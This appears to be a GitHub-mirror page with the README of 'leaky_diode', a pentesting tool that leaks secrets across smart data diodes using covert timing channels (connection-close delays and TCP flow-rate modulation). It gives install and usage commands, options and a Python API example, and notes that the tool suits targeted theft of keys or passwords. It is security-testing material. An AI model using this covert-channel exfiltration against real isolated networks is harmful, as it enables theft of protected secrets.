GithubHelp home page GithubHelp logo

secnot / leaky_diode Goto Github PK

View Code? Open in Web Editor NEW
7.0 3.0 0.0 41 KB

Leaky diode is a data exfiltration test tool for data diodes.

License: GNU Affero General Public License v3.0

Python 100.00%
data diodes exfiltration pentesting cybersecurity

leaky_diode's Introduction

Leaky Diodes

Leaky diode is a data exfiltration test tool for smart data diodes, that is data diodes with support for TCP pass-through with the help of some side channel from the isolated side. The attacks used are flow modulation and/or close delay:

  • CLOSE DELAY uses the delay between the request of one the secret's bits and the time the server closes the connection to encode the bit value. (i.e.- 10 seconds delay means a 0, 30 seconds delay a 1)

  • FLOW MODULATION uses tcp flow control mechanism to encode secret's bits as a transfer speed. For example if the the bit requested by the client is 1 the server throttles the speed to 300KB/s, if it's 0 to 100KB/s. The advantage of this attack is that using a single connection makes it harder to detect.

Installation

Download the package or clone the repository, and then install with:

python3 setup.py install

or use pypi:

pip3 install leaky_diode --user

or

sudo pip3 install leaky_diode

the path to the scripts if not installed as root will be:

/home/[username]/.local/bin/leaky_client
/home/[username]/.local/bin/leaky_server

Usage

On the isolated side launch the server:

leaky_server public_ip port 'secret string that needs leaking'

On the untrusted side launch the client and select one of the attacks,

leaky_client server_ip server_port --mode flow --partial

or

leaky_client server_ip server_port --mode close --partial

And just wait a few minutes to receive the first byte (it's the slowest), if you're not sure if it's working add --verbose option so it prints messages on each received bit.

Options

usage: leaky_client [-h] [--mode mode] [--low_delay delay] [--high_delay delay] [--low_rate rate] 
					[--high_rate rate] [--sample_time time] [--settle_time time] [--partial]
                    host port

Leaky Diode is a data exfiltration test tool for data diodes

positional arguments:
  host                  Remore host address
  port                  Remote host port

optional arguments:
  -h, --help            Show this help message and exit
  --mode mode, -m mode  Attack mode 'flow' or 'close' (default: flow)
  --low_delay delay     Close delay for low bits (default: 5s) (only Close Mode)
  --high_delay delay    Close delay for high bits (default: 10s) (only Close Mode)
  --low_rate rate       Tx rate for low bits (default: 64 KB/s) (only Flow Mode)
  --high_rate rate      Tx rate for high bits (default: 300 KB/s) (only Flow Mode)
  --sample_time time    Tx rate sampling interval (default: 3.0s) (only Flow Mode)
  --settle_time time    Settle time between sending a bit request and the start of 
                        sampling (default: 8.0s) (only Flow Mode)
  --partial             Show partial results each time another byte from the secret is received
  --verbose             Show debugging messages
usage: leaky_server [-h] host port secret_string

Leaky Diode is a data exfiltration test tool for data diodes

positional arguments:
  host           Remore host address
  port           Remote host port
  secret_string  Attack mode 'flow' or 'close' (default: a secret string)

optional arguments:
  -h, --help     Show this help message and exit
  -v, --verbose  Show debugging messages

Performance

The attack throughput with the default parameters is around 1 B/min (yes, one byte per minute), you can increase it by lowering the delay times in close delay mode, and the settle/sample times in flow modulation (the default values are very conservative)

An actual exfiltration attempt using this attack could easily leak a few KB per day, too slow for large breachs, but enough for targeted attacks for keys/passwords or selected users data.

API

It is also possible to use leaky_diode as a package and include a server in your own app:

  • class LeakyServer(host, port, secret, ticks=100, max_connections=10)

    • host: (str) Listen interface ip addres ('' for all)

    • port: (int) Listen port

    • secret: (bytes) Secret to leak (max length 65535)

    • ticks: (int) Ticks per second the worker process use to throttle the connections.

    • max_connections: (int) Max concurrent connection the server can handle.

    • start(): Initialize and launch server worker processes

    • stop(): Stop server and its workers

from leaky_diode import LeakyServer

leaky_server = LeakyServer('192.168.0.10', 9000, b'some secret byte string')
leaky_server.start()

# Do something else
......

# Close server before exit
leaky_server.close()

TODO

  • Harden message parsing input validation (invalid lengths)
  • Use concurrent connection to increase exfiltration speed.
  • Tune flow modulation mode tx speeds .
  • Tune close delay mode delays.
  • Add CRC to the secret and secret length, or even better error correction.
  • Add resume capability so there is no need to get the secret in one go.
  • Add some tests.

References

  • Data Diodes Wikipedia
  • Place holder so I remember to publish a post on the attacks
  • And another on transport and streaming protocols for data diodes

leaky_diode's People

Contributors

secnot avatar

Stargazers

 avatar  avatar  avatar  avatar  avatar  avatar  avatar

Watchers

 avatar  avatar  avatar

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    ๐Ÿ–– Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. ๐Ÿ“Š๐Ÿ“ˆ๐ŸŽ‰

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google โค๏ธ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.